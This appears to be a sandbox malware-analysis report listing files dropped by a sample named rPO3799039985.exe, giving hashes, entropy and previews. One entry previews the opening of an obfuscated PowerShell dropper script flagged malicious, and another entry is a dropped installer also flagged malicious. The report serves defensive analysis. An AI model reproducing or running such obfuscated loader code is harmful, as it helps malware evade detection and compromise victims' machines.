                                                                                                                                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.O.b.v.R.R.E.0.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.O.r.8.X.n.J.
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9472
                                                                                                                                                                                                        Entropy (8bit):4.027856490254046
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:avoj0w8OT14GPkkNOAHmFJhu2YRn06MwBQjnTYJ:av80LlvAHmzh3YR/MwBW0J
                                                                                                                                                                                                        MD5:1BC652C0101081927A26C6BC8A02B209
                                                                                                                                                                                                        SHA1:E241328D078E4BDC38D2FDB9E48675496D032EEE
                                                                                                                                                                                                        SHA-256:621F0954239B550CEF57F22144EFA70C4E8F81C11076603EAD1EDD570FEC8F0A
                                                                                                                                                                                                        SHA-512:4724E042E9E78B39A51B06415BD5FFD84B0A43C923C976BAF135EB8D75E2685D6620D7E5A6CE2E89BC1154EBF2D51C98CEA3E6CE1970A419936E7C69B33B6066
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.j.N.M.X.d.p.S.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.O.r.8.X.n.J.
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):962
                                                                                                                                                                                                        Entropy (8bit):5.003928223003816
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:tkl/Hnd6CsGkMyGWKyGXPVGArwY3vJv+8aIHrGIArpv/mOAaNO+ao9W7iN5zzkwW:qlPdRNuKyGX85WJ+vXhNlT3/7+GeWro
                                                                                                                                                                                                        MD5:923AE58BF6BBCA000C1FEB30BF9FA958
                                                                                                                                                                                                        SHA1:2A757EEFD49E77523B929D06612932463204DE03
                                                                                                                                                                                                        SHA-256:D4F66C3528D2EF3DA5D6342FE3F5F4D06CA3AF37B93457F2B92A51AEE20D518C
                                                                                                                                                                                                        SHA-512:B31B84BBD215A5592EA40F02AC506B76B40F64AD4FE62E91BA8B8656BDC090C0820A151101F2227439378DB3897EC9C0EE9773588D8B3D52DEF9DCDAF9F1947E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{. "geoplugin_request":"89.187.171.137",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Atlanta",. "geoplugin_region":"Georgia",. "geoplugin_regionCode":"GA",. "geoplugin_regionName":"Georgia",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"524",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"33.7485",. "geoplugin_longitude":"-84.3871",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                        Size (bytes):14744
                                                                                                                                                                                                        Entropy (8bit):4.990428309401091
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdB4NXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdB4NZiA
                                                                                                                                                                                                        MD5:A3F4A4CED5E4717EA59EEDAAA642F0CF
                                                                                                                                                                                                        SHA1:EB40B4929869C8C2A8866A0F06AE166F406FE493
                                                                                                                                                                                                        SHA-256:59B8E05483EA0D66C8F98CB27508791C4066743462559CE29BBF658DD88BEC0E
                                                                                                                                                                                                        SHA-512:804565218357E45BBFEE9661AF75E9941B54E1B6AA656DE02E57A0842BCA8E679F2250E004B4FF7705F4A22C65F9A3A48AF9614A851D8C062DF4DA3B99A67257
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\rPO3799039985.exe
File Type:data
Category:dropped
Size (bytes):350938
Entropy (8bit):7.548916507996504
Encrypted:false
SSDEEP:6144:ZYXVTfZUun7jSk+OHxU/O0bGIGMOZ6xvzyIrajjQQ5ofww8k0FomXHPSXbH0yMs8:yVTfZUun7jSk+w0O2GtZ6xvWIrg508kY
MD5:CF5FE6D67F3BBD79EE31B92E079DAB2A
SHA1:3926450B005A8C50523182DF366323C4E47DBE16
SHA-256:B43742385835A1FD71E347BF6280B9DD0BB4D868182A52E1717ABA589034B303
SHA-512:C3581F53C363A73111476E65361C160A8E4394A546DDAB1F864D27EAE3B32098B42E10B2717D6C13F16E92685DD0D6435A1D4AB5A21C02728C7152169177E193
Malicious:false

Process:C:\Users\user\Desktop\rPO3799039985.exe
File Type:data
Category:dropped
Size (bytes):292996
Entropy (8bit):1.2535706245313567
Encrypted:false
SSDEEP:768:rS8DLd83aSNWR2GgpLsBw8Lfo/Vl0lC9ilpJBE9RDXsqG39Zc3acb6yRmEXKIsbZ:DEaIpLIw7r4EJY9RbgFVmiZUKa1EiUO
MD5:399716C3EC3C1B290590E32C8BD0C0E7
SHA1:736B213BA4D393B55C413A335AE88A6C898558F0
SHA-256:C7D6ECCF4B065A8DE79B8BBB0E84D22396E3E7AD7A0B954479B6B44D1DD2B5F9
SHA-512:113B3AF0F94AAB1F71D6F3253345ADC3F5F0691C32C0F09D1DA7BEF9A5B480E3FA7B81FB4CF373D3A4C15E4F91D5D321C8FEAAFC2C814C86AA24DB838285EDDB
Malicious:false

Process:C:\Users\user\Desktop\rPO3799039985.exe
File Type:ASCII text, with very long lines (4647), with CRLF, LF line terminators
Category:dropped
Size (bytes):72111
Entropy (8bit):5.189678053363048
Encrypted:false
SSDEEP:1536:XeKu75bBFSm3M7COBFigPfsnIcqBWEuMAD16yG:XeKYF3Sm8GOXig3sIcqBKDEyG
MD5:BC09FC9CDF0A5DA95E467C52A6D472A3
SHA1:6AD253AC46DF46C0035F2CE2E20F13A8B0770B91
SHA-256:FA2A75BB0F0035180B26868B73ADEB572F5009D9DA582CC70EB9BC87D0F06422
SHA-512:EB8843395DB0636E7778B9A973BE39A222E8503C090796AC6B8CEA64F78FE1EE9F4C37D3813817DE6F0993C70D5842409176B32BACD2A7516D1D7CAE6CBDF7BA
Malicious:true
Preview:$Extance=$Slubberten;..<#Symphylan Overlargeness Overdearness Antilocapridae Cordeliere #>..<#Pregreet Overfactious Anteverting Indskibningernes #>..<#Tamandus Cooked Sloughed Subalgebraical stonesmith blade #>..<#Udholdeligeres Applaud Diffunderedes #>..<#Tagpapfabrikkerne Epipanies Pooch Fusionsdatoers andengradsligningernes Vertiginously Subsidieres #>..<#Mvrer Timeforbruget Forvanskningers Yokeable Stabiliteter latino #>...$Undeprived = @'.Quailys.Fantasi$Hoku.poLO dsgnis Unci ceStre.niacuberswdKnirkengIdyli maAndrocrnEkstraugYndersm=Man.unt$.amarasSInterpiu pietetsHeraclitEvisiteeGnatfann Ince datilv ninSol sancVisceriewaywodes ozosge; Mistin. AtypicfSpermssuSlutfljnLobotomc VixenitLedemotiforbrydoRinniesnOverens E ementBGlistene Pjask,t Pl,moshOpbyg.eo sociocrHyperconSpeci l6humilif9M tzjom Fam li( Emi ra$JordemoLDetronin Civiliu Tilkb dlarceniv .ontakiAmphigokBirgithl lainneiTogbetjnTemp ragAf lipnsmisconcpFimblesjNeum.skeFol,ekocSupersce Prec,pr AflytnnGayal.seFlavour,Toftapr$

Process:C:\Users\user\Desktop\rPO3799039985.exe
File Type:data
Category:dropped
Size (bytes):314736
Entropy (8bit):1.2449159395564426
Encrypted:false
SSDEEP:768:OJtiGOXJxXqfHlq+f+h/y7XOt3Cc264R6ALPh7UIUcrskV2vh4iMPkSebkDXdA+u:sR+HIhWvho6q+E3VVSRk00LISJ2HZ2+B
MD5:74D22FA11B6A81B523703D86EE6410CF
SHA1:B492DC83190A441949C9BCA39CA607BB1AEB99E7
SHA-256:521321FB45ED43C67F878D1B3FBC4730813745CD5C1F8620EFC687104D274A5F
SHA-512:F3BA07525FD622F5CA9F1348AE0FFFB76691A72CC291F1EDB3C5F028939C89F2EB661AD0435B4F5AB72692712905AE792D903B38D4B575A06F4B41A309C3CA08
Malicious:false

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):687803
Entropy (8bit):7.805842466953427
Encrypted:false
SSDEEP:12288:NiNbeGX4+5+aeLJOwLqgUf5/G2ywJCfANIsCssyKBsFLL+Wlra97H6Vy:ib9l+PMxgGJGhs0iLaWl8ac
MD5:EFB9125831992267D27C5DD9A2BDC0BE
SHA1:0BE2E44632121C8FC2F325ED4AF6B91E49486711
SHA-256:7028C43EDB1ED93FEE2D535A938B07A687D01CF5A5E4DC9E9104D5FA372089CA
SHA-512:B3BA5A31A5012907853CEF9EE1BC2AEFBB084BE4DFAB095B695065DC1BD460546B7FBCE10788010168977562D5A859C471DAC44C712B5EFA3F0D60CB6CCF1383
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 8%

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true
Preview:[ZoneTransfer]....ZoneId=0

Process:C:\Users\user\Desktop\rPO3799039985.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):412
Entropy (8bit):4.192391163281544
Encrypted:false
SSDEEP:12:r1J7RVPufFanmnm3ulNjE65HjVvldXe2JlD+n:hJHVot5HxvdJU
MD5:E66E7200CCD685911F937E28961D75D0
SHA1:1997901649D7A072B1EBA65066061723BCBCD761
SHA-256:7A07CF9CE7D37DB2AD4E85FEE76E5768F4CEDD9FC585A1FBC21A45D842E2A4FE
SHA-512:D5F414584F9898AD2DB87913CEA866CB6864128CD36A9279B7C257B4F2EBAA760DD41FE3E6ADABF50BC029C74EA8D4A140CBA8DC2BA93F6BB86B5EA9D6195337
Malicious:false
Preview:haders menneskealders nulvksten.bramraas skovlingers djvlens vinperse.ledertillggene metodiks initieredes,monger udspecificeringernes annbeths countertail siennas argentine risikablere maltha autocystoplasty kontaktformidlingens skraafladen..julestuernes liparomphalus cogging holmgangenes centrumdemokraternes,presentationes entocele ndtrftig transportegenskaber containerization spotlysenes incommensurateness,

Process:C:\Users\user\Desktop\rPO3799039985.exe
File Type:data
Category:dropped
Size (bytes):205374
Entropy (8bit):1.2643137219362226
Encrypted:false
SSDEEP:768:AOXyjqFZGYEmKWu77kfudkFtMlfqrig3OkyuW/+fNbPwKQCzGYgzEV9VV1A0jorK:rmbjPy81NzWXwSGqpN
MD5:B990C3EB94E6AC09E8DCC7E60F906681
SHA1:5CA18F4310F4C727FD171ED5FBDE72F961ECE459
SHA-256:506BBA53D913CEB7832495190229754A1B3C50937DB22A2D0B4C2EB58BF34F82
SHA-512:57DEA1BA990F56BC66501A30EBA4CE3815186240A7879C7C939C3F0A2DDE28FE53420F956EF2FBE059197F203EC041686A9E31EF003A08E3DDBE6575A988DEB3
Malicious:false

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):14979
Entropy (8bit):5.632850769444258
Encrypted:false
SSDEEP:384:L9iIuERzA83h09RZxeIu9J8y9CIKf+qNrB:gIuERzA83h09RZx4J8y9CIKfHNd
MD5:75BEAFF7B14E1136FF76F2910615BF55
SHA1:645E290D2A3C65EC2D3BB48CB1744CC4824B24F7
SHA-256:50687C335EC2E6A88480460B348009CC87BEA5230928792160DF425FAE1384DD
SHA-512:3A4519A49664A258305604B7140FE52F25E9E972A002CB1AC7D3C5A65C1FA1FA43256739AE65A7AC786B4F33D2D6464B8578B654282727E4AA21755D15418C1A
Malicious:false
Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14979
                                                                                                                                                                                                        Entropy (8bit):5.632850769444258
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:L9iIuERzA83h09RZxeIu9J8y9CIKf+qNrB:gIuERzA83h09RZx4J8y9CIKfHNd
                                                                                                                                                                                                        MD5:75BEAFF7B14E1136FF76F2910615BF55
                                                                                                                                                                                                        SHA1:645E290D2A3C65EC2D3BB48CB1744CC4824B24F7
                                                                                                                                                                                                        SHA-256:50687C335EC2E6A88480460B348009CC87BEA5230928792160DF425FAE1384DD
                                                                                                                                                                                                        SHA-512:3A4519A49664A258305604B7140FE52F25E9E972A002CB1AC7D3C5A65C1FA1FA43256739AE65A7AC786B4F33D2D6464B8578B654282727E4AA21755D15418C1A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14977
                                                                                                                                                                                                        Entropy (8bit):5.632671613624406
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:L9iIuERzA83h09RZxeIu968y9CIKf+qNrB:gIuERzA83h09RZx468y9CIKfHNd
                                                                                                                                                                                                        MD5:9B8F148E46E9BCBE8D62C34081F052E7
                                                                                                                                                                                                        SHA1:474537195126F2873F48183357BFBB01E3C30F23
                                                                                                                                                                                                        SHA-256:200A88987C6EF66CF289A7AB2C0B31CA8FE9CFF110A0300C4B7C09C16DD70C7A
                                                                                                                                                                                                        SHA-512:A5BD35C1A4F879CD7500F1ABBEA53950128EF3E1B8417668C27D52F1107AABECA8FA9CE0BEA79AF4C9DCBCAF7227374EDA2C10846A6816C37878CD1D0A14A7A1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                        Entropy (8bit):0.03142918454149101
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:zWbe2PWxhemgvKxKhrmNEv+tD5uMSIePW1hJk+Dzdn8y08Tcm2RGOdBx:zWCAhC9R5uMOPGhW+D508T2RGOD
                                                                                                                                                                                                        MD5:3C4B8ECA46360D10D11772C674677C00
                                                                                                                                                                                                        SHA1:236E47FCF1CAF4A8E3B67D118544CB1545B3B1FE
                                                                                                                                                                                                        SHA-256:EAC885318BBE7E94180741A6FA0F724FF4A647009020D269E6D10659D1822243
                                                                                                                                                                                                        SHA-512:471346A7DA69AD939B2D188DD42486BE8690C18FC869E6FB083502A1EED576D8DD1AD8A67860D3A96C6A7CEDAEDAA3057FF2454F9C48EC5E9B8FB0BAAA65C949
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:...@..@...@.....C.].....@................L...L..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0......C<>.Z...................C<>.Z..................UMA.PersistentHistograms.DriveType......8...i.y.[".................................................i.y..Yd........A...........................7o.I'.Y.".4.............8o.I'.Y.................UMA.PersistentHistograms.HistogramsInStartupFile........ ...i.y.......7o.I'.Y..C<>.... ...i.y.......7o.I'.Y.7o.I........i.y..Yd........A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.........i.y.Pq.3................94.0.992.31-64".en-US*...Windows NT..10.0.1904224..x86_64..|.......".To Be Filled By O.E.M....x86_64:F..variations_seed_etag.."mOB9Fluqaq+mietxhYXSL2cAH0KxdzECs1csHpZVA18="P....5...............4.>.2...:..............0..,.......TelemetryPopSampleSampling......Default.................................................................
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3045002, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                        Entropy (8bit):1.4026573159402624
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TB9aw/aHLopFMavU1/iB8eVC+rQ88TkQqp8JHyDlEKw0esEieNp:1PareMa8K8eVC+rZ8TkQqpWSDlNufp
                                                                                                                                                                                                        MD5:F49DFF163167A43F4940B7337A092C07
                                                                                                                                                                                                        SHA1:1A8BAAC92537FA0BD39063D17C3072AD86190CC4
                                                                                                                                                                                                        SHA-256:B3D38278030DBEA9D1CDDC177F9B6CB590CE1D383A88211B231402B7CA208CF3
                                                                                                                                                                                                        SHA-512:BC7685763D70300FE2AE28803D9F886D91004F6045A995065FAAEB6A9DFCAB77E80B475516E9B4C1F8969E112E2B48C7E68FC2AB15F61BB69443A8C54E24066F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................v.......@..g.....@....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):28481
                                                                                                                                                                                                        Entropy (8bit):5.673738414711985
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:IeolWTv8F1+UoAYDCx9Tuqh0VfUC9xbog/OVILlDPrUStvIl:IeolWTvu1jaVLqSM
                                                                                                                                                                                                        MD5:05B3EA38D4AC2D106219222D8470E758
                                                                                                                                                                                                        SHA1:1464C06668DBB41744BFA94BD78FCDE000679F27
                                                                                                                                                                                                        SHA-256:EEAD25E8C98A5010426D5189CECBE187AD7D6B0375316795A0C09312198CF12C
                                                                                                                                                                                                        SHA-512:FF73AE245EACDF1599809DCE42879A88D3DF7A5AC6B7E525EECC2B9FE4F36C24E25A1228807AAE1AAC05C0BCB38182D6A5EF82650DC454BE4F1C485EB1E0ACFC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"edge":{"services":{"account_id":"000340011677ED77","last_account_id":"000340011677ED77","last_username":"shahak.shapira@outlook.com"}},"extensions":{"settings":{"ampmimodbocknpfehkbdjolnnbongejb":{"state":1},"dgiklkfkllikcanfonkcabmbdfmgleag":{"active_permissions":{"api":[],"manifest_permissions":[]},"commands":{},"content_settings":[],"creation_flags":1,"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13275099748198646","location":5,"manifest":{"content_capabilities":{"include_globs":["https://*excel.officeapps.live.com/*","https://*onenote.officeapps.live.com/*","https://*powerpoint.officeapps.live.com/*","https://*word-edit.officeapps.live.com/*","https://*excel.partner.officewebapps.cn/*","https://*onenote.partner.officewebapps.cn/*","https://*powerpoint.partner.officewebapps.cn/*","https://*word-edit.partner.officewebapps.cn/*","https://*excel.gov.online.office365.us/*","https://*onenote.gov.online.office365.u
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8192
                                                                                                                                                                                                        Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MsFl:/F
                                                                                                                                                                                                        MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                        SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                        SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                        SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                        Malicious:false
